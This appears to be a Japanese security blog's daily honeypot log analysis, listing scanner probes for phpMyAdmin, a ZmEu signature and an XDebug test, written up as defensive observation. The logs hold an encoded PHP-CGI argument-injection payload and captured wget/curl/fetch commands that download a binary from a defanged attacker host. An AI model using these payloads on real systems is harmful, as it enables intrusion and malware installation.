S-Owl

S(ecurity)Owl

トップ > honeypot > WOWHoneypotの簡易分析(36日目)

WOWHoneypotの簡易分析(36日目)

honeypot

WOWhoneypotの2018/07/09(月) (運用37日目)の簡易分析です。
本日の総アクセス件数は 160件です。少し件数は回復しました。
以下が全アクセスログです。

34 2018-07-09 GET /
4 2018-07-09 HEAD /
2 2018-07-09 GET /xampp/phpmyadmin/index.php
2 2018-07-09 GET /www/phpMyAdmin/index.php
2 2018-07-09 GET /web/phpMyAdmin/index.php
2 2018-07-09 GET /typo3/phpmyadmin/index.php
2 2018-07-09 GET /tools/phpMyAdmin/index.php
2 2018-07-09 GET /pmd/index.php
2 2018-07-09 GET /pma-old/index.php
2 2018-07-09 GET /pmamy/index.php
2 2018-07-09 GET /pmamy2/index.php
2 2018-07-09 GET /PMA/index.php
2 2018-07-09 GET /pma/index.php
2 2018-07-09 GET /PMA2/index.php
2 2018-07-09 GET /phpMyAdmin/phpMyAdmin/index.php
2 2018-07-09 GET /phpmyadmin/phpmyadmin/index.php
2 2018-07-09 GET /phpMyAdminold/index.php
2 2018-07-09 GET /phpMyAdmin.old/index.php
2 2018-07-09 GET /phpmyadmin-old/index.php
2 2018-07-09 GET /phpMyAdmin/index.php
2 2018-07-09 GET /phpmyadmin/index.php
2 2018-07-09 GET /phpMyadmin_bak/index.php
2 2018-07-09 GET /phpmyadmin2/index.php
2 2018-07-09 GET /phpmyadmin1/index.php
2 2018-07-09 GET /phpmyadmin0/index.php
2 2018-07-09 GET /phpadmin/index.php
2 2018-07-09 GET /mysql/index.php
2 2018-07-09 GET /mysqladmin/index.php
2 2018-07-09 GET /myadmin/index.php
2 2018-07-09 GET /myadmin2/index.php
2 2018-07-09 GET /index.php
2 2018-07-09 GET /db/index.php
2 2018-07-09 GET /dbadmin/index.php
2 2018-07-09 GET /claroline/phpMyAdmin/index.php
2 2018-07-09 GET /admin/PMA/index.php
2 2018-07-09 GET /admin/pma/index.php
2 2018-07-09 GET /admin/phpMyAdmin/index.php
2 2018-07-09 GET /admin/phpmyadmin/index.php
2 2018-07-09 GET /admin/phpmyadmin2/index.php
2 2018-07-09 GET /admin/mysql/index.php
2 2018-07-09 GET /admin/mysql2/index.php
2 2018-07-09 GET /admin/index.php
2 2018-07-09 CONNECT 133.130.126[.]119:43
1 2018-07-09 PROPFIND /
1 2018-07-09 POST /xx.php
1 2018-07-09 POST /xw.php
1 2018-07-09 POST /wuwu11.php
1 2018-07-09 POST /w.php
1 2018-07-09 POST /s.php
1 2018-07-09 POST /sheep.php
1 2018-07-09 POST /db_session.init.php
1 2018-07-09 POST /db.init.php
1 2018-07-09 POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
1 2018-07-09 HEAD /phpmyadmin/index.php
1 2018-07-09 HEAD /phpmyadmin/%20index.php
1 2018-07-09 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-07-09 GET /webdav/
1 2018-07-09 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-07-09 GET /scripts/setup.php
1 2018-07-09 GET /pma/scripts/setup.php
1 2018-07-09 GET /PMA2012/
1 2018-07-09 GET /pma2012/
1 2018-07-09 GET /PMA2011/
1 2018-07-09 GET /pma2011/
1 2018-07-09 GET /phpMyAdmin/scripts/setup.php
1 2018-07-09 GET /phpmyadmin/scripts/setup.php
1 2018-07-09 GET /phpmyadmin4/
1 2018-07-09 GET /phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php
1 2018-07-09 GET /phpmyadmin3/
1 2018-07-09 GET /phpMyAdmin-2/scripts/setup.php
1 2018-07-09 GET /phpMyAdmin-2.11.11/scripts/setup.php
1 2018-07-09 GET /phpMyAdmin-2.11.11.3/scripts/setup.php
1 2018-07-09 GET /phpMyAdmin-2.10.0.0/scripts/setup.php
1 2018-07-09 GET /phpmyadmin2/
1 2018-07-09 GET /phpma/index.php
1 2018-07-09 GET /mysql/scripts/setup.php
1 2018-07-09 GET /mysqladmin/scripts/setup.php
1 2018-07-09 GET /mysql-admin/index.php
1 2018-07-09 GET /mysql/
1 2018-07-09 GET /MyAdmin/scripts/setup.php
1 2018-07-09 GET /myadmin/scripts/setup.php
1 2018-07-09 GET /db/scripts/setup.php
1 2018-07-09 GET /dbadmin/scripts/setup.php 

phpMyAdmin関連(74件)と/を除外したアクセス数です。

2 2018-07-09 GET /pmd/index.php
2 2018-07-09 GET /phpadmin/index.php
2 2018-07-09 GET /mysql/index.php
2 2018-07-09 GET /mysqladmin/index.php
2 2018-07-09 GET /myadmin/index.php
2 2018-07-09 GET /myadmin2/index.php
2 2018-07-09 GET /index.php
2 2018-07-09 GET /db/index.php
2 2018-07-09 GET /dbadmin/index.php
2 2018-07-09 GET /admin/mysql/index.php
2 2018-07-09 GET /admin/mysql2/index.php
2 2018-07-09 GET /admin/index.php
2 2018-07-09 CONNECT 133.130.126[.]119:43
1 2018-07-09 POST /xx.php
1 2018-07-09 POST /xw.php
1 2018-07-09 POST /wuwu11.php
1 2018-07-09 POST /w.php
1 2018-07-09 POST /s.php
1 2018-07-09 POST /sheep.php
1 2018-07-09 POST /db_session.init.php
1 2018-07-09 POST /db.init.php
1 2018-07-09 POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
1 2018-07-09 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-07-09 GET /webdav/
1 2018-07-09 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-07-09 GET /scripts/setup.php
1 2018-07-09 GET /mysql/scripts/setup.php
1 2018-07-09 GET /mysqladmin/scripts/setup.php
1 2018-07-09 GET /mysql-admin/index.php
1 2018-07-09 GET /mysql/
1 2018-07-09 GET /MyAdmin/scripts/setup.php
1 2018-07-09 GET /myadmin/scripts/setup.php
1 2018-07-09 GET /db/scripts/setup.php
1 2018-07-09 GET /dbadmin/scripts/setup.php

いくつかphpmyadmin関連ぽいパスもありますが、phpmyadminまたはpmaを入っているもののみ、phpmyadmin関連として除外するようにしています。

さて、特徴的なZmEuのアクセスがあります。

GET /w00tw00t.at.blackhats.romanian.anti-sec:)

同一のアクセス元IPからのアクセス先は以下です。

"GET /w00tw00t.at.blackhats.romanian.anti-sec:)
"GET /phpmyadmin/scripts/setup.php
"GET /phpMyAdmin/scripts/setup.php
"GET /mysqladmin/scripts/setup.php
"GET /PMA2012/
"GET /pma2012/
"GET /PMA2011/
"GET /pma2011/
"GET /phpmyadmin2/
"GET /phpmyadmin3/
"GET /phpmyadmin4/
"GET /pma/scripts/setup.php
"GET /myadmin/scripts/setup.php
"GET /MyAdmin/scripts/setup.php
"GET /mysql/scripts/setup.php
"GET /phpMyAdmin-2.10.0.0/scripts/setup.php
"GET /phpMyAdmin-2.11.11/scripts/setup.php
"GET /phpMyAdmin-2.11.11.3/scripts/setup.php
"GET /phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php
"GET /dbadmin/scripts/setup.php
"GET /db/scripts/setup.php
"GET /scripts/setup.php
"GET /phpMyAdmin-2/scripts/setup.php
"GET /mysql/

phpMyAdmin関係を狙っていると思われます。パスが微妙にことなるものもあるため、はやり同一の攻撃と見なしても良い気がします。
またアクセスはスキャンのみで、影響を与えるような攻撃的なスキャンはありませんでした。

それ以外で新しいアクセスは以下です。

GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Connection: close
Accept-Encoding: gzip

どうやら、XDebugというPHPをリモートでデバッグするツールがあり、それで扱えるかというテストのようです。

 

本日のハンティングログは以下です。Apache Magicaに含まれる攻撃コード1つが3つに分けて検知されています。

1 2018-07-09 wget hxxp://mafiagalati.hi2[.]ro/unix ; curl -O hxxp://mafiagalati.hi2[.]ro/unix ; fetch hxxp://mafiagalati.hi2[.]ro/unix
1 2018-07-09 fetch hxxp://mafiagalati.hi2[.]ro/unix
1 2018-07-09 curl -O hxxp://mafiagalati.hi2[.]ro/unix ; fetch hxxp://mafiagalati.hi2[.]ro/unix 

 

以上です。